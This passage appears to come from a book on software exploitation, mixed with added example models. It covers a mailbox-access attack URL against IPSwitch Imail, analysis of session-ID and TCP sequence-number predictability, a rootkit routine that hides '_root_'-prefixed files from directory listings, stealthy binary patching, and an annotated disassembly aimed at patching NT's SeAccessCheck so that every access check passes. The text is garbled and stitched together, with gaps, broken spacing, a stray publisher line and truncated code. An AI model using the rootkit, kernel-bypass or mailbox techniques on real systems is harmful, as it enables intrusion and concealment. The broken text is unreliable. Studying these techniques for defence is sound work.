Attack Pattern: Session ID, Resource ID, and Blind Trust

When session and resource IDs are simple and available, attackers can use them to their advantage. Many schemes are so simple that pasting in another known ID in a message stream works.

A variation on the session ID attack exists when an application allows the user to specify a resource [...] wish to access. If the user can specify resources belonging to other users, then the system may [...] attack.

* Attack Example: IPSwitch Imail, Blind Trusted Mailbox Name

Resources can be files, records in a database, or even ports and hardware devices. In a multiuser [...] resources may be personal files and e-mail. Web-based e-mail systems are a good example of a multiuser environment that often uses session IDs. A resource request may include additional identifiers such as a mailbox name. A perfect example is IPSwitch Imail, an e-mail system that includes a Web-based [...] end for retrieving e-mail. A user will authenticate with the system and will be granted a session [...] to read e-mail then looks something like this:

http://target:8383//readmail.cgi?uid=username&mbx=../username/Main

A few problems are immediately apparent. First, we notice that the user must supply not only the [...] but the username as well. In fact, the user must also supply a file path. The fact these identity d[...] supplied more than once is a dead giveaway that something might be wrong with the readmail.cgi [...]. In practice, if the username is swapped with a different username, the request still works! In fact, [...] request returns the other user's mail! An attack looks something like this:

http://target:8383//readmail.cgi?uid=username&mbx=../someone_elses_us
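The readmail.cgi request shape above, modelled in Python as an added example (not code from the book or from IPSwitch Imail): a handler that blindly trusts the caller's uid and mbx, the fix that derives the owner from the server-side session, and an audit check that flags the request pattern. The session store, user names and mailbox contents are constructed sample data.

```python
import posixpath
import re

# Constructed sample state (not real data): session ID -> authenticated user,
# and a flat "file system" of mailboxes keyed by <user>/<mailbox>.
SESSIONS = {"sess-8f3a": "alice"}
MAILBOXES = {
    "alice/Main": ["hello alice"],
    "bob/Main": ["hello bob", "bob's private note"],
}
# A mailbox name is one path component: no separators, no dots.
MAILBOX_NAME = re.compile(r"[A-Za-z0-9_]{1,32}")


def readmail_vulnerable(session_id, uid, mbx):
    """Blind trust, as in the readmail.cgi request above: the session is only
    checked for existence, then the mailbox path is built from the caller's
    own uid and mbx parameters."""
    if session_id not in SESSIONS:
        raise PermissionError("no such session")
    # "../someone_else/Main" walks out of the uid directory after normalisation.
    path = posixpath.normpath(posixpath.join(uid, mbx))
    return MAILBOXES.get(path)


def readmail_fixed(session_id, mbx="Main"):
    """The owner comes from the server-side session, never from the request,
    and the mailbox name is restricted to one safe path component."""
    user = SESSIONS.get(session_id)
    if user is None:
        raise PermissionError("no such session")
    if not MAILBOX_NAME.fullmatch(mbx):
        raise ValueError("invalid mailbox name")
    return MAILBOXES.get(f"{user}/{mbx}")


def audit_request(session_id, uid, mbx):
    """Findings a code reviewer or log filter would raise for one request:
    a uid that disagrees with the session owner, and a mailbox parameter
    that carries path separators or parent-directory traversal."""
    findings = []
    owner = SESSIONS.get(session_id)
    if owner is None:
        findings.append("unknown session")
    elif uid != owner:
        findings.append(f"uid {uid!r} does not match session owner {owner!r}")
    if "/" in mbx or "\\" in mbx:
        findings.append("mailbox parameter contains a path separator")
    if ".." in mbx.split("/"):
        findings.append("mailbox parameter contains parent-directory traversal")
    return findings
```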

Technique: Brute Forcing Session IDs

Session IDs should not be easy to guess or to predict. Predictable numbers make life as an attacker [...] easier. Hackers have developed a number of tricks for checking predictability in session IDs. One fun one involves the use of phase space analysis.

Phase Space Analysis

Delayed coordinate embedding is a technique to graph a one-dimensional number series as a dis[...] some space (say, three space). The technique has been around at least since 1927 and is c[...] texts on dynamical systems. The practitioner measures a single variable in a dynamic system [...] many times. Once a sample set is obtained, the set is graphed in multidimensional space. This causes r[...] between the data to become apparent. The technique has immediate benefits for detecting random number sets. A predictable number sequence will show evidence of structure in three space. A random [...] set will appear as evenly distributed noise. The equation used for the following graphs is

X[n] = s[n-2] - s[n-3]
Y[n] = s[n-1] - s[n-2]
Z[n] = s[n] - s[n-1]

Think of this equation as a comb that is being dragged through a number series (Figure 4-11). The [...] between the teeth is known as the "lag," which in this case is one. The number of teeth is the dimension, which in this case is three. The comb itself represents the point. As we drag the comb through the [...] graph many points.


Figure 4-11. Phase space analysis is like combing through a number series


Figure 4-12 is a screen shot of several thousand points sampled from a MAC OS X server. The number [...] sampled is the initial sequence number of the TCP stack. It is best if this number is not easy to predict. The graph was made using a simple program written for Windows that plots the points using OpenGL.

Figure 4-12. A three-dimensional phase space plot of 100,000 samples of the initial sequence numbers of MAC OS-X. This plot was created using the Windows OpenGL code shown later.[9]



[9] The plot in Figure 4-12 was made using a data set presented by Michael Zalewski (http://razor.bindview.com/publish/papers/tcpseq.html).

The distribution plotted for OS-X clearly shows a pattern. The localized clusters of points are areas [...] ISN is more likely to be selected. A truly random ISN would not show these clusters. A truly random [...] is plotted in Figure 4-13 so you can see the difference. The random number sequence results in [...] distribution over the phase space diagram shown in Figure 4-13. No localized structures are apparent.

Figure 4-13. A three-dimensional phase space plot of random points [...] white noise.
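The embedding and the clustering it reveals, as an added example in Python (not the book's OpenGL viewer): phase_space_points applies the X, Y, Z equations given above to a sequence, and occupied_cells counts how many cells of a coarse three-dimensional grid the points fall into, a numeric stand-in for eyeballing the plot. Both ISN sequences are constructed with a seeded generator; the "predictable" one steps by one of two constants plus a little jitter, the kind of scheme that leaves the clusters seen in Figure 4-12, and the 1% fill threshold is an assumption for this example.

```python
import random


def phase_space_points(seq):
    """Delayed coordinate embedding with lag 1 and dimension 3, exactly the
    comb from the text: point n is (s[n-2]-s[n-3], s[n-1]-s[n-2], s[n]-s[n-1])."""
    return [(seq[n - 2] - seq[n - 3], seq[n - 1] - seq[n - 2], seq[n] - seq[n - 1])
            for n in range(3, len(seq))]


def occupied_cells(points, bins=20):
    """Split the bounding box of the point cloud into bins**3 equal cells and
    return how many contain at least one point. Structured (predictable)
    sequences leave most cells empty; noise-like sequences fill many."""
    if not points:
        return 0
    lo = [min(p[k] for p in points) for k in range(3)]
    hi = [max(p[k] for p in points) for k in range(3)]
    cells = set()
    for p in points:
        idx = []
        for k in range(3):
            span = hi[k] - lo[k]
            b = 0 if span == 0 else min(bins - 1, (p[k] - lo[k]) * bins // span)
            idx.append(b)
        cells.add(tuple(idx))
    return len(cells)


def looks_structured(seq, bins=20, min_fill=0.01):
    """Heuristic verdict: flag the generator if its points occupy less than
    min_fill of the grid. The threshold is an assumption for this example."""
    return occupied_cells(phase_space_points(seq), bins) < min_fill * bins ** 3


def predictable_isns(n, seed=1):
    """Constructed sample: an ISN generator that adds 64000 or 128000 per
    connection plus a little jitter. The deltas take only two bands of values,
    so the comb collects the points into a handful of clusters."""
    rng = random.Random(seed)
    isn, out = 0x12345678, []
    for _ in range(n):
        isn += rng.choice((64000, 128000)) + rng.randint(0, 100)
        out.append(isn)
    return out


def random_isns(n, seed=1):
    """Constructed sample: 32-bit values from a seeded PRNG, which is enough to
    look like white noise under this test (it is not a cryptographic generator)."""
    rng = random.Random(seed)
    return [rng.getrandbits(32) for _ in range(n)]
```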




Reading the data set into our OpenGL viewer is simple:

in_file=fopen("data.bin", "r");
if(in_file)
{
    ///////////////////////////////////////////////////
    // Create a data set or read it from somewhere.
    ///////////////////////////////////////////////////
    int i = 0;

    // This is cheap.
    int *pt_array = new int[99999];

    float mean = 0;

    while(!feof(in_file) && i < 99998)
    {
        char _c[64];
        fgets(_c, 62, in_file);
        DWORD s = atoi(_c);
        pt_array[i] = s;
        i++;
        mean += s;
    }
    mean = mean/i;

    int j=3;
    while(j

dwLenToNext );

// This block was used in the JK code for alt
//null.sys file information?
// left out for now ... -Greg
//if( RtlCompareMemory( (PVOID)&p->suName[ 0 ],
//    (PVOID)&g_swRootSys[ 0 ], 20 ) == 20 )
//{
//    p->ftCreate = fdeNull.ftCreate;
//    p->ftLastAccess = fdeNull.ftLastAccess;
//    p->ftLastWrite = fdeNull.ftLastWrite;
//    p->dwFileSizeHigh = fdeNull.dwFileSizeHigh;
//    p->dwFileSizeLow = fdeNull.dwFileSizeLow;
//}
//else

// compare directory-name prefix with '_root_'
// decide if to hide or not.
if( RtlCompareMemory( (PVOID)&p->suName[ 0 ],
    (PVOID)&g_swFileHidePrefix[ 0 ], 12 ) == 12 )
{
    if( bLastOne )
    {
        // hidden entry is the last one: either report no more files
        // (STATUS_NO_MORE_FILES) or unlink it from the previous entry
        if( p == (PDirEntry) FileInformationBuffer )
            rc = 0x80000006;
        else
            pLast->dwLenToNext = 0;
        break;
    }
    else
    {
        // hidden entry is in the middle: shift the rest of the buffer over it
        int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
        int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
        RtlCopyMemory( (PVOID)p,
            (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
        continue;
    }
}
pLast = p;
p = (PDirEntry)((char *)p + p->dwLenToNext );
} while( !bLastOne );
}
}
return(rc);
}

Patching Binary Code

One of the benefits of reverse engineering is that you can gain an understanding of a program in terms of its binary code. As you become acclimatized to the process and gain some experience, you begin to notice and recognize certain data structures or subroutines simply by how they look in a [...] editor. This may sound weird, but you might be scrolling through a binary file at a later date and [...] yourself saying "oh, there's a jump table" or "huh, this is probably the prolog to a subroutine." This is a natural ability that evolves as you learn to understand machine code directly. Like everything, the ability improves with practice.

The feeling of power associated with this skill is very rewarding. Soon it becomes obvious that no code is sacred. Although this is a clear theoretical reality, it is one that few people come to grasp in any tangible way. Even self-encrypted code can be broken. Simply put, if code runs on a processor, it must at some point be decrypted. The decryption routine itself cannot be easily encrypted at all.

For many years, the software-cracking community has worked hard on the many subtle problems of reverse engineering. In almost every case, the cracking community has managed to break every particular copy protection mechanism used by software vendors. The reverse engineering process [...] leads to a copy of serial number generation code, or a binary patch that removes some copy-check logic from the target program. As a good friend of ours always says, "If it can be made, it can be unmade."

Peephole Patches

Patching something into a program without altering its data state is an excellent trick to know. One [...] direct application of this trick can be used to snoop data. You may want to sniff information in the target program without altering the original program behavior in any obviously discernable way. This can be done using a peephole patch. Note that the fundamental goal of this technique is always to add new code without affecting program state.

Because the technique does not require source code access, it can be applied to almost any software [...] field component. Because the technique is noninvasive to CPU registers, the stack, or heap memory, the attacker can be confident that the technique will not alter the original program behavior or be detected by standard measures.

In this example, we use the section padding in a formatted executable to store additional code. Section padding has been used to similar ends for years by virus programs. We use the technique here to add additional code to the executable.

Let's add a trace statement to the following code:

int my_function( int a )
{
    if(a == 1)
    {
        // TRACE("a is equal to one");
        printf("ccc");
        return 42;
    }
    printf("-");
    return 0;
}

The f un ct ion , comp iled w it hout debu gging , look s lik e t h is:

00401000 cmp  dword ptr [esp+4],1
00401005 jne  0040101A
00401007 push 407034h
0040100C call 00401060
00401011 add  esp,4
00401014 mov  eax,2Ah
00401019 ret
0040101A push 407030h
0040101F call 00401060
00401024 add  esp,4
00401027 xor  eax,eax
00401029 ret

In this listing, we can see that the compiled program has several jmp statements. These statements cause the code to branch. Typically these branches occur as a result of if() or while() calls present in the source code. We can take advantage of this fact and subtly alter program flow. Patches placed over branching statements do not require code to be shifted in any way. That is, we can cause the jump statement to go elsewhere without altering the code around it. In this example, we alter a [...] statement to branch to our added TRACE code. After the TRACE code has executed, another jump is used to take the program directly back to where it was before our sneaky code borrowed a few c[...]. The program state is not altered in any obvious way, and the registers are intact. Thus, for all intents and purposes, the program and its user remain completely unaware that the program has been modified. The modified program will continue to operate without discernable effect (unless you are the attacker, that is).

Table of Content s

•The n ondebuI ndex g ver sion of t he su br out ine p r oduces t he f ollowin g b yt es: Expl oit ing Softw a re How to Br e ak Code By Gr eg Hoglund , Gar y McGr aw

Pub lish er: Addison Wesley Pub Dat e: February 17, 200 4 I SBN: 0- 20 1- 786 95 -8 Pages: 51 2

00401000  83 7C 24 04 01     cmp    dword ptr [esp+4],1
00401005  75 13              jne    0040101A
00401007  68 34 70 40 00     push   407034h
0040100C  E8 4F 00 00 00     call   00401060
00401011  83 C4 04           add    esp,4
00401014  B8 2A 00 00 00     mov    eax,2Ah
00401019  C3                 ret
0040101A  68 30 70 40 00     push   407030h
0040101F  E8 3C 00 00 00     call   00401060
00401024  83 C4 04           add    esp,4
00401027  33 C0              xor    eax,eax
00401029  C3                 ret

The OutputDebugString() call looks like this:

77F8F659  B8 9F 00 00 00     mov    eax,9Fh
77F8F65E  8D 54 24 04        lea    edx,[esp+4]
77F8F662  CD 2E              int    2Eh

which is called via



00401030  68 38 70 40 00     push   407038h
00401035  FF 15 58 60 40 00  call   dword ptr ds:[406058h]
0040103B  C3                 ret

We have accomplished something quite powerful in this example—adding the ability to trace execution and know when particular program states have occurred. This allows us some insight into the logical flow inside a program, which is excellent news for budding software exploiters.

Patching the NT Kernel to Remove All Security

As a general rule, some of the best patches are very simple in nature. A good patch may be only a few bytes long. This is certainly the case with the NT kernel. It is possible to patch the kernel and remove all security with, literally, just a few well-placed bytes. This trick was published by one of us (Hoglund) several years ago. Since then, multiple sources have reported optimizing the kernel patch to a single byte. In one case, the difference between the original byte and the patched byte is actually only 2 bits! This leads to a very amusing "2-bit hack" to the NT OS. The idea that a single state flip can cause such a far-reaching and catastrophic result to the security of a system is very telling. Perhaps NT security is only worth two bits after all!

Personally, we would be afraid to fly on an airplane in which the flight control software could be easily and catastrophically affected by a solar flare. Imagine the US navy, which to this day operates ships using a Windows NT infrastructure. Could a simple bit flip (caused by, say, a power surge) compromising computer memory cause the entire security control of the information system to fail? If the bit flip occurs in a primary domain controller this may very well be the case. Many safety-critical software systems are extremely fault tolerant to strange bit rot, but not Windows NT. Clearly, fault tolerance was not one of the goals of the Microsoft kernel team.

The following is a reverse assembly of a critical function in the NT kernel called SeAccessCheck(). This single function is responsible for enforcing a go/no-go on all object access in the kernel. This means that, no matter who you are, if you try to access something within the NT environment, you have to get past this function first. This goes for all sorts of bit patterns, including registry files, handles, semaphores, and pipes. The function returns success or failure depending on the access controls placed on the target object. It performs a great deal of comparison between the access of the user and the ACL of the target. The reverse assembly is provided by IDA-Pro, as follows:

8019A0E6 ; Exported entry 816. SeAccessCheck
8019A0E6
8019A0E6 ; ===========================================================================
8019A0E6
8019A0E6 ; S u b r o u t i n e
8019A0E6 ; Attributes: bp-based frame
8019A0E6
8019A0E6                 public SeAccessCheck
8019A0E6 SeAccessCheck   proc near
8019A0E6                                         ; sub_80133D06+B0p ...
8019A0E6
8019A0E6 arg_0           = dword ptr  8          ; appears to point to a
8019A0E6                                         ; Security Descriptor
8019A0E6 arg_4           = dword ptr  0Ch
8019A0E6 arg_8           = byte ptr  10h
8019A0E6 arg_C           = dword ptr  14h
8019A0E6 arg_10          = dword ptr  18h
8019A0E6 arg_14          = dword ptr  1Ch
8019A0E6 arg_18          = dword ptr  20h
8019A0E6 arg_1C          = dword ptr  24h
8019A0E6 arg_20          = dword ptr  28h
8019A0E6 arg_24          = dword ptr  2Ch

Note that IDA shows us the arguments to the function call. This is very useful because we can see how the arguments are referenced in the code below. At the time this was discovered, the SeAccessCheck call was not documented by Microsoft directly, but it was declared in the header files provided in the DDK, where it was obviously called. The call looks like this:

BOOLEAN SeAccessCheck(
    IN PSECURITY_DESCRIPTOR       SecurityDescriptor,
    IN PSECURITY_SUBJECT_CONTEXT  SubjectSecurityContext,
    IN BOOLEAN                    SubjectContextLocked,
    IN ACCESS_MASK                DesiredAccess,
    IN ACCESS_MASK                PreviouslyGrantedAccess,
    OUT PPRIVILEGE_SET            *Privileges OPTIONAL,
    IN PGENERIC_MAPPING           GenericMapping,
    IN KPROCESSOR_MODE            AccessMode,
    OUT PACCESS_MASK              GrantedAccess,
    OUT PNTSTATUS                 AccessStatus
);

If access is allowed, the call will return TRUE. The trick, then, is to patch the code so that the call always returns TRUE. A few twists and turns aside, most of the logic in the SeAccessCheck call flows down to the following code snippet. A call occurs right at the end of the SeAccessCheck function, which you can see via the retn instruction. The call is obviously important because most of the parameters are being supplied. You can see the call is preceded by ten push instructions. This is a lot of parameters! Because most of the arguments are being passed to the SeAccessCheck function, it looks like this routine is a wrapper for something deeper. We now delve deeper:

8019A20C
8019A20C loc_8019A20C:                           ; CODE XREF: SeAccessCheck+10
8019A20C                 push    [ebp+arg_24]
8019A20F                 push    [ebp+arg_14]
8019A212                 push    edi
8019A213                 push    [ebp+arg_1C]
8019A216                 push    [ebp+arg_10]
8019A219                 push    [ebp+arg_18]
8019A21C                 push    ebx
8019A21D                 push    dword ptr [esi]
8019A21F                 push    dword ptr [esi+8]
8019A222                 push    [ebp+arg_0]
8019A225                 call    sub_80199836      ; decompiled below
8019A22A                 cmp     [ebp+arg_8], 0
8019A22E                 mov     bl, al
8019A230                 jnz     short loc_8019A238
8019A232                 push    esi
8019A233                 call    SeUnlockSubjectContext ; not usually hit
8019A238
8019A238 loc_8019A238:                           ; CODE XREF: SeAccessCheck+14
8019A238                 mov     al, bl
8019A23A
8019A23A loc_8019A23A:                           ; CODE XREF: SeAccessCheck+4C
8019A23A                                         ; SeAccessCheck+65 ...
8019A23A                 pop     edi
8019A23B                 pop     esi
8019A23C                 pop     ebx
8019A23D                 pop     ebp
8019A23E                 retn    28h
8019A23E SeAccessCheck   endp

The code for the call sub_80199836 is decompiled. So far we haven't made any changes to the code because we really are just trying to find our way around. The following routine is called directly from SeAccessCheck and does the actual, real work. It is here we will begin patching the kernel. IDA-Pro allows you to create comments in the source. You can see the comments made as we stepped through the source. To learn what was happening, we created a file on our computer and set the permissions so that we can't access it. We then tried repeatedly to access the file while setting breakpoints in the kernel using SoftIce. Whenever we hit the breakpoint, we single stepped through the source using SoftIce. The following is a result of perhaps a hundred trips through the code in real time. The following is a subroutine called from SeAccessCheck. Looks like most of the work is being done here. We'll try to patch this routine.
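The annotated listing that follows walks a security descriptor and its DACL; as an added example (written for this edition, not taken from the book or from Windows source), the C model below performs the same walk over a constructed self-relative descriptor, using the offsets the listing's comments identify (control word at +2, DACL offset at +10h, ACE count at ACL+4, then per ACE: type at +0, flags at +1, size at +2, access mask at +4, SID at +8) and chopping each matched allow mask out of the desired-access word the way EDI is chopped. The SIDs are constructed byte strings rather than real SID encodings, the bounds checks are additions for reading raw bytes, and because the listing's DENIED-type branch is cut off, the standard rule that a matching deny ACE overlapping the still-wanted bits fails the check is an assumption.

```c
/* Added model of the DACL walk in the sub_80199836 listing; not the book's
 * code and not Windows source. Offsets follow the listing's comments, SIDs
 * are constructed byte strings, and the deny rule below is ASSUMED because
 * the listing's DENIED-type branch is cut off. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SE_DACL_PRESENT  0x0004  /* "04" of the 80 04 control word (and cx,4) */
#define SE_SELF_RELATIVE 0x8000  /* "80" half of it (test dh,80h) */
#define INHERIT_ONLY_ACE 0x08    /* test byte ptr [esi+1],8: ACE not evaluated */
#define ACE_ALLOWED 0            /* 0 is ALLOWED_TYPE */
#define ACE_DENIED  1            /* 1 is DENIED_TYPE */
enum { SD_MALFORMED = -1, ACCESS_DENIED_RESULT = 0, ACCESS_GRANTED = 1 };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Walks a self-relative SD the way the listing does; 'desired' plays EDI.
 * Bounds checks are added because the model reads raw bytes. */
int model_access_check(const uint8_t *sd, size_t sd_len, const uint8_t *caller_sid,
                       size_t sid_len, uint32_t desired)
{
    if (sd_len < 0x14) return SD_MALFORMED;
    uint16_t control = rd16(sd + 2);                          /* 801998CD: mov dx,[eax+2] */
    if (!(control & SE_DACL_PRESENT)) return ACCESS_DENIED_RESULT; /* 801998EC: cmp cx,4 */
    uint32_t dacl_off = rd32(sd + 0x10);                      /* 801998DA: SD[10h] */
    if (dacl_off == 0 || !(control & SE_SELF_RELATIVE)) return ACCESS_DENIED_RESULT;
    if (dacl_off > sd_len || sd_len - dacl_off < 8) return SD_MALFORMED;
    const uint8_t *end = sd + sd_len, *acl = sd + dacl_off;  /* 801998E6: add esi,eax */
    uint16_t ace_count = rd16(acl + 4);                       /* 8019995E: [esi+4] = # ACEs */
    const uint8_t *ace = acl + 8;                             /* 80199ADA: add esi,8 */
    uint32_t remaining = desired;                             /* EDI */
    for (uint16_t i = 0; i < ace_count && remaining != 0; i++) { /* 80199AE7: test edi,edi */
        if ((size_t)(end - ace) < 8) return SD_MALFORMED;
        uint8_t type = ace[0], flags = ace[1];
        uint16_t size = rd16(ace + 2);
        uint32_t mask = rd32(ace + 4);
        if (size < 8 || (size_t)(end - ace) < size) return SD_MALFORMED;
        /* sub_801997C2 in the listing: does the SID at ACE offset 8 match the caller? */
        int sid_match = (size_t)(size - 8) == sid_len && memcmp(ace + 8, caller_sid, sid_len) == 0;
        if (!(flags & INHERIT_ONLY_ACE) && sid_match) {
            if (type == ACE_ALLOWED)
                remaining &= ~mask;                           /* 80199B0B..B10: and edi,~mask */
            else if (type == ACE_DENIED && (remaining & mask))
                return ACCESS_DENIED_RESULT;                  /* ASSUMED standard deny rule */
        }
        ace += size;
    }
    return remaining == 0 ? ACCESS_GRANTED : ACCESS_DENIED_RESULT; /* ALL of EDI chopped away? */
}

typedef struct { uint8_t type, flags; uint32_t mask; const uint8_t *sid; size_t sid_len; } ace_spec;

/* Serialises a constructed self-relative SD (20-byte header, then the ACL);
 * returns its length, or 0 if it does not fit in buf. */
size_t build_sd(uint8_t *buf, size_t cap, const ace_spec *aces, size_t n)
{
    const size_t hdr = 0x14;
    if (cap < hdr + 8) return 0;
    memset(buf, 0, cap);
    buf[0] = 1;                                               /* SD revision */
    wr16(buf + 2, SE_SELF_RELATIVE | SE_DACL_PRESENT);        /* the 80 04 number */
    wr32(buf + 0x10, (uint32_t)hdr);                          /* offset to the DACL */
    uint8_t *acl = buf + hdr, *p = acl + 8;
    acl[0] = 2;                                               /* ACL revision */
    wr16(acl + 4, (uint16_t)n);                               /* number of ACEs */
    for (size_t i = 0; i < n; i++) {
        size_t size = 8 + aces[i].sid_len;
        if (cap - (size_t)(p - buf) < size) return 0;
        p[0] = aces[i].type; p[1] = aces[i].flags;
        wr16(p + 2, (uint16_t)size);
        wr32(p + 4, aces[i].mask);
        memcpy(p + 8, aces[i].sid, aces[i].sid_len);
        p += size;
    }
    wr16(acl + 2, (uint16_t)(p - acl));                       /* ACL size */
    return (size_t)(p - buf);
}

/* Constructed principals (not real SID encodings) and a constructed file DACL:
 * deny alice write, allow alice read, an inherit-only exec grant that must be
 * skipped, and everything for admins. */
static const uint8_t SID_ALICE[]  = { 1, 5, 0, 0, 0, 0, 0, 5, 0xE8, 0x03 };
static const uint8_t SID_ADMINS[] = { 1, 5, 0, 0, 0, 0, 0, 5, 0x20, 0x02 };
enum { FILE_READ = 0x1, FILE_WRITE = 0x2, FILE_EXEC = 0x20 };

int demo_check(const uint8_t *caller, size_t caller_len, uint32_t desired)
{
    const ace_spec aces[] = {
        { ACE_DENIED,  0,                FILE_WRITE,  SID_ALICE,  sizeof SID_ALICE  },
        { ACE_ALLOWED, 0,                FILE_READ,   SID_ALICE,  sizeof SID_ALICE  },
        { ACE_ALLOWED, INHERIT_ONLY_ACE, FILE_EXEC,   SID_ALICE,  sizeof SID_ALICE  },
        { ACE_ALLOWED, 0,                0xFFFFFFFFu, SID_ADMINS, sizeof SID_ADMINS },
    };
    uint8_t buf[128];
    size_t len = build_sd(buf, sizeof buf, aces, 4);
    return len ? model_access_check(buf, len, caller, caller_len, desired) : SD_MALFORMED;
}

/* Exit status 0 when alice's read is granted and her write is refused. */
int main(void) { return demo_check(SID_ALICE, sizeof SID_ALICE, FILE_READ) == ACCESS_GRANTED
                    && demo_check(SID_ALICE, sizeof SID_ALICE, FILE_WRITE) == ACCESS_DENIED_RESULT ? 0 : 1; }
```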



80199836 ; ==============================================================================
80199836
80199836 ; S u b r o u t i n e
80199836 ; Attributes: bp-based frame
80199836
80199836 sub_80199836    proc near               ; CODE XREF: PAGE:80199FFA
80199836                                         ; SeAccessCheck+13F ...
80199836
80199836 var_14          = dword ptr -14h
80199836 var_10          = dword ptr -10h
80199836 var_C           = dword ptr -0Ch
80199836 var_8           = dword ptr -8
80199836 var_2           = byte ptr -2
80199836 arg_0           = dword ptr  8
80199836 arg_4           = dword ptr  0Ch
80199836 arg_8           = dword ptr  10h
80199836 arg_C           = dword ptr  14h
80199836 arg_10          = dword ptr  18h
80199836 arg_16          = byte ptr  1Eh
80199836 arg_17          = byte ptr  1Fh
80199836 arg_18          = dword ptr  20h
80199836 arg_1C          = dword ptr  24h
80199836 arg_20          = dword ptr  28h
80199836 arg_24          = dword ptr  2Ch
80199836
80199836                 push    ebp
80199837                 mov     ebp, esp
80199839                 sub     esp, 14h
8019983C                 push    ebx
8019983D                 push    esi
8019983E                 push    edi
8019983F                 xor     ebx, ebx
80199841                 mov     eax, [ebp+arg_8]  ; pulls eax
80199844                 mov     [ebp+var_14], ebx ; ebx is zero, looks
                                                   ; like it init's
                                                   ; a bunch of local
80199847                 mov     [ebp+var_C], ebx
8019984A                 mov     [ebp-1], bl
8019984D                 mov     [ebp+var_2], bl
80199850                 cmp     eax, ebx          ; check that arg8 is
                                                   ; NULL
80199852                 jnz     short loc_80199857
80199854                 mov     eax, [ebp+arg_4]  ; arg4 pts to
                                                   ; "USER32"
80199857
80199857 loc_80199857:
80199857                 mov     edi, [ebp+arg_C]  ; checking some flags
                                                   ; off this one
8019985A                 mov     [ebp+var_8], eax  ; var_8 = arg_4
8019985D                 test    edi, 1000000h     ; obviously flag
                                                   ; desired access
                                                   ; I think...
80199863                 jz      short loc_801998CA ; normally this jumps..
                                                    ; go ahead and jump
80199865                 push    [ebp+arg_18]
80199868                 push    [ebp+var_8]
8019986B                 push    dword_8014EE94
80199871                 push    dword_8014EE90
80199877                 call    sub_8019ADE0      ; another undoc'd sub
8019987C                 test    al, al            ; return code
8019987E                 jnz     short loc_80199890
80199880                 mov     ecx, [ebp+arg_24]
80199883                 xor     al, al
80199885                 mov     dword ptr [ecx], 0C0000061h
8019988B                 jmp     loc_80199C0C
80199890 ; ===========================================================================
removed source here
801998CA ; ===========================================================================
801998CA
801998CA loc_801998CA:                           ; jump from above lands here
801998CA                                         ; sub_80199836
801998CA                 mov     eax, [ebp+arg_0]  ; arg0 pts to a
                                                   ; Security Descriptor
801998CD                 mov     dx, [eax+2]       ; offset 2 is that
                                                   ; 80 04 number...
801998D1                 mov     cx, dx
801998D4                 and     cx, 4             ; 80 04 become 00 04
801998D8                 jz      short loc_801998EA ; normally doesnt jump
801998DA                 mov     esi, [eax+10h]    ; SD[10h] is an offset
                                                   ; value to the DACL
                                                   ; the SD
801998DD                 test    esi, esi          ; make sure it exists
801998DF                 jz      short loc_801998EA
801998E1                 test    dh, 80h
801998E4                 jz      short loc_801998EC
801998E6                 add     esi, eax          ; FFWDS to first DACL
                                                   ; in SD ******
801998E8                 jmp     short loc_801998EC ; normally all good
                                                    ; here, go ahead
                                                    ; jump
801998EA ; ===========================================================================
801998EA
801998EA loc_801998EA:                           ; CODE XREF: sub_8019983
801998EA                                         ; sub_80199836+A9
801998EA                 xor     esi, esi
801998EC
801998EC loc_801998EC:                           ; CODE XREF: sub_8019983
801998EC                                         ; sub_80199836+B2
801998EC                 cmp     cx, 4             ; jump lands here
801998F0                 jnz     loc_80199BC6
801998F6                 test    esi, esi
801998F8                 jz      loc_80199BC6
801998FE                 test    edi, 80000h       ; we normally don't match
                                                   ; so go ahead and jump
80199904                 jz      short loc_8019995E
*** removed source here ***
8019995E ; ===========================================================================
8019995E
8019995E loc_8019995E:                           ; CODE XREF: sub_801998
8019995E                                         ; sub_80199836+D4 ...
8019995E                 movzx   eax, word ptr [esi+4] ; jump lands
                                                       ; offset 4 is number of
                                                       ; ACEs present in
80199962                 mov     [ebp+var_10], eax ; var_10 = # Ace's
80199965                 xor     eax, eax
80199967                 cmp     [ebp+var_10], eax
8019996A                 jnz     short loc_801999B7 ; normally jump
*** removed source here ***
801999A2 ; ===========================================================================
*** removed source here ***
801999B7 ; ===========================================================================
801999B7
801999B7 loc_801999B7:                           ; CODE XREF: sub_8019983
801999B7                 test    byte ptr [ebp+arg_C+3], 2 ; looks like part of
                                                           ; the flags data,
                                                           ; we usually jump
801999BB                 jz      loc_80199AD3
*** removed source here ***
80199AD3 ; ===========================================================================
80199AD3
80199AD3 loc_80199AD3:                           ; CODE XREF: sub_8019983
80199AD3                 mov     [ebp+var_C], 0    ; jump lands here
80199ADA                 add     esi, 8
80199ADD                 cmp     [ebp+var_10], 0   ; is number of ACE's zero?
80199AE1                 jz      loc_80199B79      ; normally not
80199AE7
80199AE7 loc_80199AE7:                           ; CODE XREF: sub_8019983
80199AE7                 test    edi, edi          ; the EDI register is very
                                                   ; important we will continue
                                                   ; to loop back to this point
                                                   ; As we traverse each ACE
                                                   ; the EDI register is modified
                                                   ; with each ACE's access
                                                   ; if a SID match occurs.
                                                   ; Access is allowed only
                                                   ; EDI is completely blank
                                                   ; by the time we are done
80199AE9                 jz      loc_80199B79      ; jumps to exit routine
                                                   ; if EDI is blank
80199AEF                 test    byte ptr [esi+1], 8 ; checks for ACE v
                                                     ; 8, second byte..
                                                     ; I don't know what
                                                     ; this is, but if
                                                     ; not 8, it's not
                                                     ; evaluated, not
                                                     ; important
80199AF3                 jnz     short loc_80199B64
80199AF5                 mov     al, [esi]         ; this is the ACE
                                                   ; which is 0, 1, or 4
80199AF7                 test    al, al            ; 0 is ALLOWED_TYPE
                                                   ; 1 is DENIED_TYPE
80199AF9                 jnz     short loc_80199B14 ; jump to next block if
                                                    ; it's not type 0
80199AFB                 lea     eax, [esi+8]      ; offset 8 is the
80199AFE                 push    eax               ; pushes the ACE
80199AFF                 push    [ebp+var_8]
80199B02                 call    sub_801997C2      ; checks to see if
                                                   ; caller matches the
                                                   ; SID return of 1
